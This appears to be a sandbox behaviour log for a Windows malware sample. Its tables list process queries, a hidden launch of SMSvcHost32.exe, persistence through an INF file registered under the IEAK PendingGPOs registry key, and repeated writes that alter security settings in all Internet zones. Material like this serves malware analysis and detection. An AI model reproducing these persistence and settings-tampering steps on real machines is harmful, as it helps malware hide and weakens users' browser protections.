| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
|
For performance reasons, the remaining 10556 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Thread 0x814
23
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 5000 milliseconds (5.000 seconds) |
|
1 | |
| Module | Load | module_name = advapi32, base_address = 0x74aa0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SystemFunction036, address_out = 0x74682a60 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:01:39 (UTC) |
|
1 | |
| File | Create | filename = C:\Windows\system32\cmd.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | type = time |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf, size = 296 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs, value_name = Count, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs, value_name = Path1, data = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf, size = 104, type = REG_SZ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs, value_name = Section1, data = DefaultInstall, size = 28, type = REG_SZ |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:01:49 (UTC) |
|
1 | |
| File | Create | filename = C:\Windows\system32\cmd.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | type = time |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf, size = 298 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 |
Thread 0xd8c
43
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Get Info | filename = C:\Users\All Users\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\All Users\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default User\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default User\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| System | Sleep | duration = 5000 milliseconds (5.000 seconds) |
|
1 | |
| File | Get Info | filename = C:\Users\All Users\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\All Users\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default User\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default User\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| System | Sleep | duration = 5000 milliseconds (5.000 seconds) |
|
1 | |
| File | Get Info | filename = C:\Users\All Users\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\All Users\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default User\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default User\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| System | Sleep | duration = 5000 milliseconds (5.000 seconds) |
|
1 | |
| File | Get Info | filename = C:\Users\All Users\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\All Users\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default User\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Default User\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\AppData\Local\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Public\Local Settings\Temp\uqjckeguhl.tmp, type = file_attributes |
|
1 |
Thread 0x370
2
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Process | Create | process_name = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe --vwxyz, os_pid = 0xdb8, creation_flags = CREATE_DETACHED_PROCESS, CREATE_BREAKAWAY_FROM_JOB, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xe7c
240
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
